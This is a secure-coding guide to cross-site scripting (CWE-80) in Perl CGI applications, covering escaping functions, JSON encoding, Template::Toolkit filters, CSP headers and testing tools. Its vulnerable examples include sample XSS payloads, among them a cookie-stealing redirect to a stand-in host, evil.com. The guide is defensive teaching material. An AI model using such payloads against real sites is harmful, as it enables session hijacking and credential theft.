CWE-80: Cross-Site Scripting (XSS) - Perl

Overview

Cross-Site Scripting (CWE-80) occurs when untrusted data is included in web pages without proper encoding. Attackers inject malicious scripts that execute in victims' browsers, where they can hijack sessions, steal credentials, or perform actions on behalf of users. Perl applications must encode all user-controlled output using context-appropriate functions.

Primary Defence: Use CGI.pm's escapeHTML() for HTML contexts and escape() for URL parameters. For new projects, prefer a framework whose templates escape output by default (such as Mojolicious), or use Template::Toolkit with HTML entity filters. Always apply context-appropriate encoding (HTML, JavaScript, or URL) based on where user data appears in output.

Common Vulnerable Patterns

Direct User Input in HTML

use CGI qw(:standard);

# VULNERABLE - No encoding
my $name = param('name');
print "<h1>Hello, $name!</h1>";

# Attack: ?name=<script>alert(document.cookie)</script>
# Result: Script runs in the victim's browser with access to document.cookie

Why this is vulnerable: Directly interpolating CGI parameters into HTML without encoding allows attackers to inject arbitrary HTML and JavaScript. The param('name') function returns raw user input, and when printed directly into an HTML tag, special characters like <, >, and " are interpreted as HTML markup rather than text. An attacker can inject <script> tags to execute JavaScript, steal cookies via document.cookie, redirect users, or perform actions on their behalf. The lack of encoding makes this a classic reflected XSS vulnerability.

Unescaped User Input in HTML Attributes

# VULNERABLE - User input in style attribute
my $color = param('color');
print qq{<div style="color: $color">Text</div>};

# Attack: ?color=red" onmouseover="alert(document.cookie)
# Result: The quote ends the style attribute and adds an event handler

Why this is vulnerable: HTML attributes are parsing contexts where quotes, spaces, and other characters have syntactic meaning. In this example a double quote in the input closes the style attribute, and the attacker can then add an event-handler attribute such as onmouseover="alert(1)". Unquoted attribute values are even easier to break out of, because a space is enough to start a new attribute. Encoding the quote is not the whole fix for a style attribute: the value is still parsed as CSS, so an attacker can add properties of their own, such as url() references that load external resources, and older browsers also executed JavaScript through expression() or url(javascript:...). All user input in attributes must be HTML-encoded and quoted, and values that end up in CSS, such as a colour, should also be validated against an allowlist.
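Because a style value is still interpreted as CSS after HTML encoding, a safer approach for this example is to accept only values that match an allowlist. The sketch below assumes that a plain colour name or a #rgb/#rrggbb hex value is all the page needs; safe_color and the black fallback are illustrative choices, not part of CGI.pm.

```perl
use strict;
use warnings;

# Hypothetical helper: accept a plain colour name or a #rgb/#rrggbb hex
# value, and fall back to a fixed default for anything else.
sub safe_color {
    my ($input) = @_;
    return 'black' unless defined $input;
    return $input
        if $input =~ /\A(?:[A-Za-z]{1,20}|#[0-9A-Fa-f]{3}(?:[0-9A-Fa-f]{3})?)\z/;
    return 'black';
}

# In the CGI script this would be safe_color(param('color')).
my $color = safe_color($ARGV[0]);
print qq{<div style="color: $color">Text</div>\n};
```

Since the pattern admits no quotes, semicolons, or parentheses, the value can neither leave the attribute nor add CSS properties; HTML-encoding it as well costs little and guards against a later loosening of the pattern.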

User Input in JavaScript Context

# VULNERABLE - Direct interpolation in script
my $msg = param('message');
print qq{<script>alert('$msg');</script>};

# Attack: ?message='; document.location='http://evil.com/steal?cookie='+document.cookie; //
# Result: Cookie theft via redirect

Why this is vulnerable: Embedding user input directly into JavaScript code allows attackers to break out of the string context using quotes and inject arbitrary JavaScript commands. The single quote in the attack closes the alert string, the semicolon terminates that statement, the attacker's code runs, and the trailing // comments out the rest of the line. HTML encoding is the wrong tool here: escaping < and > does not stop a quote from ending the string, and the browser does not decode entities inside a <script> element. JavaScript contexts require JavaScript-specific escaping (quotes, backslashes, newlines, and sequences such as </script>) or, better yet, JSON encoding. Attackers can steal cookies, redirect to phishing sites, modify page content, or perform actions as the authenticated user.
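The vulnerable example above can be rewritten to emit the value as a JSON string literal. This is a minimal sketch assuming the core JSON::PP module; json_for_script is a hypothetical helper name. After encoding, <, > and & are rewritten as \u escapes, which keeps the JSON valid while ensuring the HTML parser never sees a closing </script> tag.

```perl
use strict;
use warnings;
use JSON::PP;

# Hypothetical helper: serialise a Perl value for an inline <script> block.
# JSON::PP escapes quotes, backslashes and control characters; ->ascii also
# turns non-ASCII characters (including U+2028/U+2029) into \uXXXX escapes.
# Rewriting <, > and & afterwards hides "</script>" and "<!--" from the
# HTML parser without changing the decoded value.
sub json_for_script {
    my ($data) = @_;
    my $json = JSON::PP->new->ascii->canonical->allow_nonref->encode($data);
    $json =~ s/</\\u003c/g;
    $json =~ s/>/\\u003e/g;
    $json =~ s/&/\\u0026/g;
    return $json;
}

# The attack string from the vulnerable example becomes inert string data.
my $msg = q{'; document.location='http://evil.com/steal?cookie='+document.cookie; //};
print '<script>alert(' . json_for_script($msg) . ");</script>\n";
```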

Template Interpolation Without Escaping

# VULNERABLE - Direct interpolation in heredoc
my $comment = param('comment');
print <<HTML;
<div class="comment">
    $comment
</div>
HTML

# Attack: comment=<img src=x onerror=alert(document.cookie)>
# Result: XSS via image error handler

Why this is vulnerable: Perl's heredoc syntax (<<HTML) performs variable interpolation, directly inserting the value of $comment into the HTML output without any encoding. This is equivalent to string concatenation and provides no XSS protection. The <img> tag with an onerror handler is a common XSS vector - the invalid src triggers the error handler which executes JavaScript. Heredocs and quoted strings with interpolation are convenient but dangerous when they contain user input. Always use escapeHTML() or encode_entities() before interpolating user data into templates.
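The heredoc stays convenient if the value is escaped before it is interpolated. So that this sketch runs without CPAN modules, it defines html_escape as a hypothetical stand-in for escapeHTML() or encode_entities(); in a real application, call the library function instead.

```perl
use strict;
use warnings;

# Hypothetical stand-in for CGI::escapeHTML / HTML::Entities::encode_entities.
sub html_escape {
    my ($str) = @_;
    return '' unless defined $str;
    $str =~ s/&/&amp;/g;    # first, so the entities added below stay intact
    $str =~ s/</&lt;/g;
    $str =~ s/>/&gt;/g;
    $str =~ s/"/&quot;/g;
    $str =~ s/'/&#39;/g;
    return $str;
}

# In the CGI script this value would come from param('comment').
my $comment      = '<img src=x onerror=alert(document.cookie)>';
my $safe_comment = html_escape($comment);    # escape immediately before use

print <<"HTML";
<div class="comment">
    $safe_comment
</div>
HTML
```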

Building HTML with String Concatenation

# VULNERABLE - Manual HTML construction
my $html = "<p>" . $user_input . "</p>";
print $html;

# Attack: user_input=</p><script>alert(1)</script><p>
# Result: Closes paragraph, injects script, reopens paragraph

Why this is vulnerable: String concatenation to build HTML treats user input as trusted HTML markup, allowing attackers to inject arbitrary tags. The </p> closes the intended paragraph, the <script> tag injects malicious code, and the final <p> masks the attack by maintaining valid HTML structure. This pattern is particularly dangerous because it bypasses any output encoding - the string is constructed with literal angle brackets that browsers interpret as HTML. Always use encoding functions or template systems with auto-escaping rather than manual HTML construction with concatenation.

Secure Patterns

Using CGI Autoescape Functions

use CGI qw(:standard);

# SECURE - Auto-escaped by CGI.pm
print start_html('Form'),
      h1('Enter Information'),
      start_form,
      'Name: ', textfield('name'),      # Auto-escaped
      br,
      'Comment: ', textarea('comment'), # Auto-escaped
      br,
      submit,
      end_form,
      end_html;

Why this works: CGI.pm version 1.57 and later automatically HTML-encodes values in form generation functions like textfield(), textarea(), popup_menu(), and others. When you use these functions, CGI.pm applies escapeHTML() internally to all user-provided values before rendering them into HTML. This prevents XSS by converting special characters (<, >, &, ", ') into HTML entities. The auto-escaping is transparent - you simply call the form functions and CGI.pm handles the security. This approach is safer than manual HTML construction because you can't accidentally forget to encode a value. However, verify your CGI.pm version (print $CGI::VERSION) to ensure you have 1.57 or later, as older versions don't auto-escape. The auto-escaping only applies to CGI.pm's HTML generation functions, not to direct print statements, so you still need manual encoding for custom HTML output.

Manual Encoding with CGI

use CGI qw(:standard escapeHTML escape);

# SECURE - Explicit escaping
my $username = param('username');
my $safe_username = escapeHTML($username);
print "<div class='user'>$safe_username</div>";

# SECURE - URL encoding
my $search_term = param('q');
my $safe_url = escape($search_term);
print qq{<a href="/search?q=$safe_url">Search</a>};

Why this works: CGI.pm's escapeHTML() function converts special HTML characters (<, >, &, ", ') into their HTML entity equivalents, preventing browsers from interpreting user input as executable code. This is the standard Perl approach for HTML encoding, analogous to htmlspecialchars() in PHP or HtmlEncoder in C#. The escape() function provides URL encoding for query parameters, percent-encoding special characters so they're treated as data rather than URL syntax. Using these CGI.pm functions ensures consistent, tested encoding across your Perl web application.

Using HTML::Entities

use HTML::Entities qw(encode_entities);

# SECURE - Encode all entities
my $user_content = param('content');
my $safe_content = encode_entities($user_content);
print "<article>$safe_content</article>";

# SECURE - Selective encoding
my $text = param('text');
my $safe_text = encode_entities($text, '<>&"\'');
print qq{<span title="$safe_text">Text</span>};

Why this works: HTML::Entities::encode_entities() provides more comprehensive HTML encoding than CGI's escapeHTML(), handling a wider range of characters including accented characters and symbols. It converts characters to numeric or named HTML entities, ensuring they display correctly while being safe from XSS. The function can encode all non-ASCII characters or just specific dangerous characters (like <>&"'). This is particularly useful when you need fine-grained control over encoding or are working with international character sets. The library is well-maintained and widely used in the Perl ecosystem.

Context-Aware Encoding

use CGI qw(param escapeHTML escape);
use JSON::XS;

my $data = param('data');

# SECURE - HTML context
print "<p>" . escapeHTML($data) . "</p>";

# SECURE - URL context
print qq{<a href="/page?id=} . escape($data) . qq{">Link</a>};

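# SECURE - JavaScript context: JSON-encode, then escape <, > and &
# so that a value containing </script> cannot end the script element
my $json_data = JSON::XS->new->encode({value => $data});
$json_data =~ s/</\\u003c/g;
$json_data =~ s/>/\\u003e/g;
$json_data =~ s/&/\\u0026/g;
print qq{<script>var config = $json_data;</script>};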

Why this works: Different output contexts require different encoding. escapeHTML() handles HTML special characters, escape() percent-encodes for URLs, and JSON::XS->encode() escapes quotes, backslashes, and control characters so that values become valid JavaScript literals. HTML encoding is the wrong tool inside a script block, because the browser does not decode entities there and encoding < and > does nothing about quotes. JSON encoding alone has the opposite gap: JSON::XS does not escape < or /, so a value containing </script> would still close the script element. Escape <, > and & in the JSON output as \u003c, \u003e and \u0026, which keeps it valid JSON. This context-aware approach prevents bypasses that occur when using the wrong encoder for a given context.

CGI Module Functions (Highest Priority)

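use CGI qw(:standard escapeHTML escape);

# Form-element autoescaping is on by default; it is toggled with the
# autoEscape() method (e.g. $q->autoEscape(1) on a CGI object). The
# -no_xhtml pragma only disables XHTML-style markup, not escaping.

# Manual HTML escaping
my $user_input = param('input');
my $safe_html = escapeHTML($user_input);
print "<div>$safe_html</div>";

# URL parameter escaping
my $user_param = param('q');
my $safe_url = escape($user_param);
print "<a href='/page?q=$safe_url'>Link</a>";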

Why this works: CGI.pm's escapeHTML() is the standard Perl function for HTML encoding, converting dangerous characters (<, >, &, ", ') into their HTML entity equivalents (&lt;, &gt;, &amp;, &quot;, &#39;). This prevents browsers from interpreting user input as executable code. The escape() function provides URL encoding (percent-encoding), converting special characters into %XX format so they're treated as data rather than URL syntax. Using CGI.pm functions ensures consistent, tested encoding across your application. CGI.pm was part of Perl's core distribution until it was removed in Perl 5.22; it is now installed from CPAN and is discouraged for new development, but it remains widely deployed. For new projects, consider modern frameworks like Mojolicious or Dancer2 and confirm that their templates escape output by default; for legacy CGI applications, escapeHTML() and escape() remain the correct choice.

Auto-escaping CGI Functions (when autoescape mode is enabled):

textfield() - Text input fields
textarea() - Text areas
password_field() - Password fields
filefield() - File upload fields
popup_menu() - Dropdown menus
optgroup() - Option groups
scrolling_list() - Scrolling lists
checkbox_group() - Checkbox groups
checkbox() - Individual checkboxes
radio_group() - Radio button groups
submit() - Submit buttons
defaults() - Reset-to-defaults button
hidden() - Hidden fields

HTML::Entities Module

use HTML::Entities;

# Encode HTML entities
my $safe_output = encode_entities($user_input);
print "<p>$safe_output</p>";

# Encode specific characters only
my $partial = encode_entities($text, '<>&"');

# Decode when needed
my $decoded = decode_entities($encoded);

Why this works: The HTML::Entities module provides robust HTML entity encoding through encode_entities(), which converts dangerous characters (<, >, &, ", ') into their HTML entity equivalents (&lt;, &gt;, &amp;, &quot;, &#39;). By default, it also encodes all non-ASCII characters and control characters, providing comprehensive protection against XSS attacks. You can specify which characters to encode as a second parameter: encode_entities($text, '<>&"') encodes only those four characters, which covers element content and double-quoted attributes; add ' to the set if values can appear in single-quoted attributes. This is more flexible than CGI.pm's escapeHTML() and is recommended for modern Perl applications. The module handles Unicode correctly when given decoded character strings and is widely tested. Use encode_entities() for HTML body content and attribute values, but remember that different contexts (JavaScript, URLs) require different encoding functions.

Context-Specific Encoding

HTML Content Context

use HTML::Entities qw(encode_entities);

# Encode for HTML body
my $safe = encode_entities($user_data);
print "<div>$safe</div>";

HTML Attribute Context

use CGI qw(escapeHTML);

# Encode for attributes (always use quotes)
my $safe_attr = escapeHTML($user_value);
print qq{<input type="text" value="$safe_attr">};

JavaScript Context

use JSON::XS;

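# Use JSON encoding for JavaScript, then escape <, > and & so that a
# value containing </script> cannot close the script element
my $json = JSON::XS->new->allow_nonref->encode($data);
$json =~ s/</\\u003c/g;
$json =~ s/>/\\u003e/g;
$json =~ s/&/\\u0026/g;
print qq{<script>var data = $json;</script>};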

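# Or escape manually for use inside a quoted JavaScript string literal
sub escape_js {
    my $str = shift;
    $str =~ s/\\/\\\\/g;            # backslash first
    $str =~ s/'/\\'/g;
    $str =~ s/"/\\"/g;
    $str =~ s/\n/\\n/g;
    $str =~ s/\r/\\r/g;
    $str =~ s/</\\x3c/g;             # prevents </script> and <!-- sequences
    $str =~ s/>/\\x3e/g;
    $str =~ s/\x{2028}/\\u2028/g;    # not allowed in string literals before ES2019
    $str =~ s/\x{2029}/\\u2029/g;
    return $str;
}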

URL Context

use CGI qw(escape);

# URL-encode parameters
my $safe_param = escape($user_input);
print "<a href='/search?q=$safe_param'>Search</a>";

# Or use URI::Escape
use URI::Escape qw(uri_escape);
my $encoded = uri_escape($param);

Why this works: URL parameters require percent-encoding (also called URL encoding), which converts special characters into %XX hexadecimal format. CGI.pm's escape() function and URI::Escape's uri_escape() both perform this encoding, converting characters like spaces to %20, ampersands to %26, and equals signs to %3D. This prevents attackers from injecting additional query parameters (like &admin=true) or breaking the URL structure. For strings that may contain non-ASCII characters, use uri_escape_utf8(), because uri_escape() refuses characters above \xFF. URL encoding is different from HTML encoding: it treats a different set of characters as special and produces %XX sequences rather than entities such as &amp;. After URL-encoding parameters, you should still HTML-encode the entire URL when embedding it in an HTML attribute such as href, providing defense-in-depth. Always validate URL schemes (allow only http:// and https://) to prevent javascript: URL attacks, as encoding alone doesn't prevent these.
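The two rules in this paragraph, percent-encode parameters and validate the scheme of user-supplied URLs, can be combined as in the following sketch, which relies only on core Perl. percent_encode approximates CGI's escape(), escape_attr stands in for escapeHTML(), and the policy in safe_href (absolute http/https URLs or site-relative paths only) is an assumption to adapt; all three names are hypothetical.

```perl
use strict;
use warnings;

# Percent-encode everything except RFC 3986 unreserved characters,
# approximating CGI::escape / URI::Escape::uri_escape_utf8.
sub percent_encode {
    my ($str) = @_;
    utf8::encode($str);    # operate on UTF-8 bytes rather than characters
    $str =~ s/([^A-Za-z0-9\-._~])/sprintf('%%%02X', ord $1)/ge;
    return $str;
}

# Minimal stand-in for escapeHTML() when writing attribute values.
sub escape_attr {
    my ($str) = @_;
    $str =~ s/&/&amp;/g;    # first, so the entities added below stay intact
    $str =~ s/</&lt;/g;
    $str =~ s/>/&gt;/g;
    $str =~ s/"/&quot;/g;
    $str =~ s/'/&#39;/g;
    return $str;
}

# Hypothetical policy: allow absolute http(s) URLs or site-relative paths
# only; javascript:, data:, and protocol-relative //host URLs are rejected.
sub safe_href {
    my ($url) = @_;
    return '#' unless defined $url && $url =~ m{\A(?:https?://|/(?![/\\]))}i;
    return escape_attr($url);
}

my $term = q{cats & dogs="yes"};
print '<a href="/search?q=' . percent_encode($term) . qq{">Search</a>\n};
print '<a href="' . safe_href('javascript:alert(1)') . qq{">Profile</a>\n};
```

Rejecting unknown schemes and substituting a harmless # keeps the link markup intact while discarding the attacker-controlled target.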

Using Template::Toolkit with Auto-escaping

use CGI qw(param);
use HTML::Entities ();
use Template;

my $tt = Template->new({
    FILTERS => {
        html_entity => \&HTML::Entities::encode_entities,
    },
});

# SECURE - Template with encoding

$tt->process(\*DATA, {
    user_input => param('input'),
}) or die $tt->error;

__DATA__
<div>[% user_input | html_entity %]</div>

Why this works: Template::Toolkit (TT2) is a powerful templating system but doesn't auto-escape by default; you must explicitly apply filters. By registering an html_entity filter that wraps HTML::Entities::encode_entities(), you can safely encode user input in templates using the pipe syntax ([% variable | html_entity %]). This separates presentation logic (templates) from encoding logic while ensuring all output is properly escaped. The filter approach makes it easy to spot unencoded variables during code review: any [% variable %] without a filter is potentially vulnerable. Template::Toolkit also ships built-in html and html_entity filters; the built-in html filter encodes only <, >, & and ", so it does not protect single-quoted attributes. Register your encoding filter globally in the Template configuration so it's available to all templates. For defense-in-depth, consider using template linting tools to detect variables without encoding filters.

Verification and Detection

Security testing requires multiple approaches - unit tests alone are insufficient.

Static Application Security Testing (SAST)

Use automated tools to detect XSS in Perl code:

Commercial Tools:

Checkmarx - Perl web application security analysis
Fortify - Data flow tracking for Perl/CGI
Veracode - Perl security scanning

Open Source Tools:

Perl::Critic with security policies

# Install Perl::Critic and a security-focused policy (this one targets SQL
# injection; Perl::Critic's bundled policies do not trace XSS data flow)
cpan Perl::Critic
cpan Perl::Critic::Policy::ValuesAndExpressions::PreventSQLInjection

# Run security checks
perlcritic --severity 1 --verbose 8 your_script.pl

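Semgrep - Pattern-based security scanning (confirm that your Semgrep version supports Perl and that the ruleset below exists before relying on it)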
```
semgrep --config=p/perl .
```

Dynamic Application Security Testing (DAST)

Test running Perl applications:

OWASP ZAP - Automated web vulnerability scanner
Burp Suite Professional - Comprehensive security testing
Nikto - Web server vulnerability scanner
w3af - Web application attack and audit framework

Code Review Checklist

Manually verify:

All print statements use escapeHTML() or encode_entities()
No direct interpolation of param() values into HTML
Template::Toolkit uses [% FILTER html %] or [% var | html %]
CGI.pm autoescape mode enabled
No unescaped-output constructs applied to user input (for example, Mojolicious's <%== %> tag or Mojo::ByteStream objects, which bypass auto-escaping)
Context-appropriate encoding (HTML vs JavaScript vs URL)
All input sources identified (params, cookies, headers)

Framework-Specific Tools

CGI.pm:

# Rough heuristic: list param() calls not wrapped in an encoder on the same line
grep -rn --include='*.pl' --include='*.cgi' "param(" . | grep -v "escapeHTML\|encode_entities"

Template::Toolkit:

# Find unfiltered variables (rough heuristic: also matches directives such as IF or FOREACH)
grep -r "\[%" templates/ | grep -v "FILTER\|html\|html_entity"
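Where the grep above is too noisy, a short Perl script can skip uppercase TT directives and recognise the common filters. It is still a heuristic: variables inside a [% FILTER html %] block and implicit assignments such as [% x = 1 %] are reported, and the keyword and filter lists below are assumptions to extend for your templates. The script name in the usage comment is hypothetical.

```perl
use strict;
use warnings;

# Uppercase Template Toolkit directives that do not print a variable.
my %keyword = map { ($_ => 1) } qw(
    IF ELSIF ELSE UNLESS END FOREACH FOR WHILE NEXT LAST SET DEFAULT CALL
    INCLUDE PROCESS INSERT WRAPPER BLOCK FILTER USE MACRO SWITCH CASE
    TRY CATCH FINAL THROW RETURN STOP CLEAR META PERL RAWPERL
);

# Return the expressions of [% ... %] tags that look like variable output
# without an html, html_entity, uri or url filter.
sub unfiltered_vars {
    my ($text) = @_;
    my @hits;
    while ($text =~ /\[%-?\s*(.*?)\s*-?%\]/gs) {
        my $expr = $1;
        my ($first) = $expr =~ /\A(\w+)/ or next;    # skips [%# comments %]
        next if $keyword{$first};
        next if $expr =~ /\|\s*(?:html|html_entity|uri|url)\b/;
        push @hits, $expr;
    }
    return @hits;
}

# Usage: perl find_unfiltered.pl templates/*.tt
for my $file (@ARGV) {
    open my $fh, '<', $file or do { warn "Skipping $file: $!\n"; next };
    my $text = do { local $/; <$fh> };
    close $fh;
    printf "%s: [%% %s %%]\n", $file, $_ for unfiltered_vars($text);
}
```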

Limited Role of Manual Tests

Unit tests can confirm that an encoder behaves as expected, but they cannot show that every output path uses it:

use strict;
use warnings;
use Test::More;
use HTML::Entities qw(encode_entities);

# Tests verify encoding - NOT comprehensive security
sub test_encoding {
    my $malicious = '<script>alert(1)</script>';
    my $encoded = encode_entities($malicious);

    unlike($encoded, qr/<script>/, 'Script tags encoded');
    like($encoded, qr/&lt;script&gt;/, 'Contains encoded tags');
}

test_encoding();
done_testing();

Important: Passing these tests does NOT mean your application is secure. Use SAST/DAST tools to find actual vulnerabilities.

Integration Testing

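use strict;
use warnings;
use Test::More;
use Test::WWW::Mechanize;
use URI::Escape qw(uri_escape);

# Base URL of the application under test (assumed; adjust for your setup)
my $base = $ENV{APP_URL} || 'http://localhost:8080';

sub test_xss_protection {
    my $mech = Test::WWW::Mechanize->new;
    my $xss_payload = '<script>alert(1)</script>';

    # URL-encode the payload and request an absolute URL
    $mech->get_ok("$base/profile?bio=" . uri_escape($xss_payload));

    # Verify the payload is reflected only in encoded form
    $mech->content_lacks($xss_payload, 'Raw XSS payload not reflected');
    $mech->content_contains('&lt;script&gt;alert(1)&lt;/script&gt;', 'Payload HTML-encoded');
}

test_xss_protection();
done_testing();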

Security Headers Testing

# Check CSP and security headers
curl -I http://localhost/app.cgi | grep -i "content-security-policy\|x-frame-options"
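The same check can run from a Perl test or CI job using the core HTTP::Tiny module. The required header list mirrors the curl command above and is an assumption to adjust; the URL is taken from the command line, and the script name in the usage comment is hypothetical.

```perl
use strict;
use warnings;
use HTTP::Tiny;

# Headers to require; mirrors the curl check above (adjust as needed).
my @required = ('content-security-policy', 'x-frame-options');

# Return the required header names missing from an HTTP::Tiny header hash.
# HTTP::Tiny stores response header names in lower case.
sub missing_headers {
    my ($headers) = @_;
    return grep { !exists $headers->{$_} } @required;
}

# Usage: perl check_headers.pl http://localhost/app.cgi
if (my $url = shift @ARGV) {
    my $res = HTTP::Tiny->new(timeout => 10)->head($url);
    die "Request failed: $res->{status} $res->{reason}\n" unless $res->{success};
    my @missing = missing_headers($res->{headers});
    print @missing ? "Missing headers: @missing\n" : "All required headers present\n";
    exit(@missing ? 1 : 0);
}
```

Exiting non-zero when a header is missing lets a CI pipeline fail the build without parsing the output.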

Continuous Security

CI/CD Integration - Run Perl::Critic in build pipeline
Pre-commit Hooks - Scan code before commits
Dependency Scanning - Check CPAN modules for vulnerabilities
Code Review - Manual security review for critical changes
Penetration Testing - Regular professional security assessments

Content Security Policy Headers

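use CGI;
use MIME::Base64 qw(encode_base64);

# Generate a fresh nonce for every response (reads /dev/urandom, so this
# assumes a Unix-like system). A fixed value such as 'nonce-random123'
# can simply be copied into injected script tags.
open my $rng, '<:raw', '/dev/urandom' or die "Cannot open /dev/urandom: $!";
read($rng, my $bytes, 16) == 16 or die "Short read from /dev/urandom";
close $rng;
my $nonce = encode_base64($bytes, '');

my $q = CGI->new;
print $q->header(
    -type => 'text/html',
    -charset => 'utf-8',
    -Content_Security_Policy => "default-src 'self'; " .
                                "script-src 'self' 'nonce-$nonce'; " .
                                "style-src 'self' 'unsafe-inline'; " .
                                "img-src 'self' https:;"
);
# Inline scripts must carry the same value: <script nonce="$nonce">...</script>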